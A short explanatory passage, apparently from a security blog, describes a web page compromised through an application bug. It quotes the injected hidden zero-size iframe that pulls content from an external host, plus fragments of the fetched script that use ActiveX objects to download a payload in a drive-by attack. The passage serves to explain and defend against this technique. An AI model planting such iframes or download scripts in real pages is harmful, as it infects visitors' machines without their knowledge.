Here is a typical example of a compromised web page. Due to a bug in a web application like phpBB2, Moveable Type or many others, the adversary was able to insert the following line of HTML into your home page:
<iframe src="http://www.somehost.com/ment/" width="0" height="0"></iframe>
When visiting your home page, the single line of HTML causes your web browser to load additional content from an external web server. When looking at the content behind www.somehost.com/ment/
[many more lines of numbers]
var var4_1="clsid:BD96C556-65A"; var var4_2="3-11D0-983A-00C04FC29E36";
ado.setAttribute("classid",var4); var xml=ado.CreateObject(var1,"");
var as=ado.createobject(var2,""); xml.Open("GET",url,0); xml.Send();
All of this with just a single line of HTML. Amazing? Right!
The actual example had some more indirections and also threw in some additional visual basic script plus some other goodies that would have complicated our explanation.